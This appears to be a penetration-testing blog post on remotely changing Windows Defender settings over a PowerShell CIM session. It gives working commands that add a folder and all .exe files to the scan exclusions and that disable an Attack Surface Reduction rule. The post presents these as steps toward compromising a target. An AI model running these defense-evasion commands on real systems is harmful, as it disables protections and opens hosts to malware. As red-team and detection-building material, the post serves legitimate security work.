Last week, we covered how to enumerate anti-virus configurations on remote systems. The information that you could gather would allow you to create a much more targeted attack against any system you are targeting. The natural next questions might be:
- What happens if there are no exception paths?
- What if no extensions are whitelisted?
- Is it possible to modify the anti-virus configuration remotely?
The last question is what I am looking to answer? Because if we can answer it, then we can answer the first few questions.
In order to modify anti-virus configs remotely, we need to follow the same process that we took when enumerating remote systems by creating a CIM session. We documented this last week, but for a refresher, you’ll want to use the following PowerShell commands as an example (modify for your needs):
- $sessopt = New-CimSessionOption -Protocol DCOM
- $secpasswd = ConvertTo-SecureString “PlainTextPassword” -AsPlainText -Force
- $creds = New-Object System.Management.Automation.PSCredential (“username”, $secpasswd)
- $sess = New-CIMSession -ComputerName <REMOTE_SYSTEM_IP_OR_HOSTNAME> -Credential $creds -SessionOption $sessopt
Now that the CIM session is created with the remote system, we can move on to the PowerShell cmdlets that will allow us to modify the antivirus configurations. There are two cmdlets that could be used: the Add-MpPreference and Set-MpPreference cmdlet. The Add-MpPreference cmdlet is used when you want to add to an existing configuration (you are appending to it) and the Set-MpPreference is used when you are (over)writing a configuration setting (thanks for helping to explain and verify this @mattifestation).
In this case, I am going to use Set-MpPreference to overwrite any existing exceptions (in my case there aren’t any). However, you should be sure to evaluate if you want to overwrite, or simply append rules. For my command, I want to set the path C:\Temp as an excluded path and I want to exclude all exe files from being scanned. This is accomplished with the following command:
Set-MpPreference -CimSession $sess -ExclusionPath C:\Temp -ExclusionExtension exe
After setting this command, I were a user on the targeted system, I could see/validate the exclusion path and executable by looking into the Windows Defender Security Center’s Exclusion menu, similar to the image below:
If you would prefer additional validation, you could use the Get-MpPreference cmdlet to obtain the remote system’s configuration, similar to below:
This just validated that we successfully modified the anti-virus exclusions configurations of a remote system.
Now, there are another set of rules that are incredibly interesting to attackers and defenders, they are Microsoft’s Attack Surface Reduction (ASR) rules. The attack surface reduction rules are an additional set of rules that attempt to block commonly exploited features or functionality that are used to compromise systems. ASR rules should absolutely be applied within your environment to help reduce your organizations attack surface.
However, if you need to compromise a system that has ASR enabled, this is another configuration which would need to be modified. Yet again, Set-MpPreference is a cmdlet that you can use to accomplish this task. When you run the Get-MpPreference cmdlet, you can see exactly which ASR rules are enabled:
To disable a specific ASR rule, you would could utilize the Set-MpPreference command along with the ASR rule, and set it to a disabled state. You can do this with a command similar to the following:
Set-MpPreference -AttackSurfaceReductionRules_Ids d1e49aac-8f56-4280-b9ba-993a6d77406c -AttackSurfaceReductionRules_Actions Disabled
If you were to run the same Get-MpPreference command, you would now see that the AttackSurfaceReductionRules_Actions has a value of “0”.
Hopefully this helps show how to modify exclusion rules and status of ASR rules. If you have any questions, please don’t hesitate to contact us at FortyNorth Security.